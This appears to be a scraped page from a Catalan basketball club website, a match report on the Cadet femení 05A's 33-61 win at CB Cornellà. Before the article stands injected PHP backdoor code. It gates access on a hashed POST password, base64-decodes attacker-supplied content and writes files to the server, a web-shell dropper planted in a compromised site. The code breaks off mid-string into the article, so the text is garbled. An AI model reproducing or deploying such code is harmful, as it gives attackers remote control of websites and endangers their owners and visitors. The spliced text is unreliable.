function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet femení 05A torna a guanyar el CB Cornellà (33-61) - Tgn Bàsquet Club -

El Cadet femení 05A torna a guanyar el CB Cornellà (33-61)

Updated: maig 19, 2021

El Cadet femení 05A viatja a la pista del CB Cornellà i aconsegueix ficar-se a la butxaca la seva tercera victòria consecutiva. El partit d’anada, jugat al pavelló del sagrat cor, va tenir un inici molt fort i es va acabar de decidir amb un bon parcial a l’últim quart, deixant el lluminós amb un favorable 58-33. El partit de tornada, sense distar gaire en el marcador (33-61) va seguir una dinàmica diferent. La falta de ritme per part de les liles van donar esperances a les locals, obrint la puntuació amb un parcial 4-1. Amb les primeres rotacions arriba nou oxigen i les tarragonines treuen profit de la pressió i converteixen les pèrdues rivals finalitzant el quart amb un 4-14.

Els contraatacs van ser la millor arma ofensiva de les visitants, que les va permetre seguir augmentant diferències de cara al descans, vers un Cornellà que patia per sortir de la pressió defensiva (14-29). Les liles, decidides a tancar el partit, van firmar un tercer període espectacular anotant 23 punts, claus per a decantar definitivament el matx. Els darrers 10 minuts van ser més escassos en anotació, arribant a perdre el parcial per un únic punt.